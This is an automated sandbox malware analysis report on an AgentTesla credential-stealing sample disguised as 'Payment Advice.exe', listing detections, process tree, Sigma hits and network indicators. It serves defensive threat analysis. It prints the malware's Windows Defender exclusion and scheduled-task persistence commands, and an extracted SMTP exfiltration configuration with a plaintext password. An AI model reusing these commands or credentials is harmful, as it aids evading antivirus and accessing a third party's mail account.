Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Advice.exe

Overview

General Information

Sample name:Payment Advice.exe
Analysis ID:1428252
MD5:f060b9400a263bea044a7789ec1d85d9
SHA1:3e939ea522e4356fbdc15c7e0119366a6369e0c9
SHA256:921ace6c0f27813fa370b65bcaee79824a4e31920dbdfec7652103c60e84cd23
Tags:AgentTeslaexePayment
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Payment Advice.exe (PID: 6700 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
    • powershell.exe (PID: 7116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7620 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7236 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Payment Advice.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
  • sFPEKzHsLkYZIz.exe (PID: 7524 cmdline: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe MD5: F060B9400A263BEA044A7789EC1D85D9)
    • schtasks.exe (PID: 7756 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sFPEKzHsLkYZIz.exe (PID: 7816 cmdline: "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
  • BjTxJte.exe (PID: 7952 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
    • schtasks.exe (PID: 8132 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpA082.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 8188 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
    • BjTxJte.exe (PID: 6576 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
  • BjTxJte.exe (PID: 7492 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
    • schtasks.exe (PID: 7672 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpC03F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 4092 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.seawaysfreight-bd.com", "Username": "samsuddin@seawaysfreight-bd.com", "Password": "36@SaM%sFl#"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000002.4124616083.0000000002D31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 37 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Payment Advice.exe.4c84a08.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Payment Advice.exe.4c84a08.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.Payment Advice.exe.4c84a08.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x31e04:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x31e76:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x31f00:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x31f92:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x31ffc:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3206e:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x32104:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x32194:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 37 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 6700, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", ProcessId: 7116, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payment Advice.exe, ProcessId: 7404, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BjTxJte
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 6700, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", ProcessId: 7116, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, ParentImage: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, ParentProcessId: 7524, ParentProcessName: sFPEKzHsLkYZIz.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp", ProcessId: 7756, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 94.100.26.91, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Payment Advice.exe, Initiated: true, ProcessId: 7404, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 6700, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", ProcessId: 7236, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 6700, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", ProcessId: 7116, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 6700, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", ProcessId: 7236, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 20.2.BjTxJte.exe.3d1f480.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.seawaysfreight-bd.com", "Username": "samsuddin@seawaysfreight-bd.com", "Password": "36@SaM%sFl#"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeReversingLabs: Detection: 42%
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeReversingLabs: Detection: 42%
                    Multi AV Scanner detection for submitted file
                    Source: Payment Advice.exeReversingLabs: Detection: 39%
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Payment Advice.exeJoe Sandbox ML: detected
                    Source: Payment Advice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49750 version: TLS 1.2
                    Source: Payment Advice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 4x nop then jmp 06EE4434h14_2_06EE3E4A
                    Source: global trafficTCP traffic: 192.168.2.4:49738 -> 94.100.26.91:587
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 94.100.26.91 94.100.26.91
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.4:49738 -> 94.100.26.91:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.ipify.org
                    Source: Payment Advice.exe, BjTxJte.exe.8.dr, sFPEKzHsLkYZIz.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: Payment Advice.exe, BjTxJte.exe.8.dr, sFPEKzHsLkYZIz.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000318E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000003247000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.seawaysfreight-bd.com
                    Source: Payment Advice.exe, BjTxJte.exe.8.dr, sFPEKzHsLkYZIz.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: Payment Advice.exe, 00000008.00000002.4119763177.000000000101B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4171500763.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006260000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006281000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009210000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009225000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/09
                    Source: Payment Advice.exe, 00000008.00000002.4119763177.000000000101B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4171500763.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006260000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006281000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009210000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009225000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
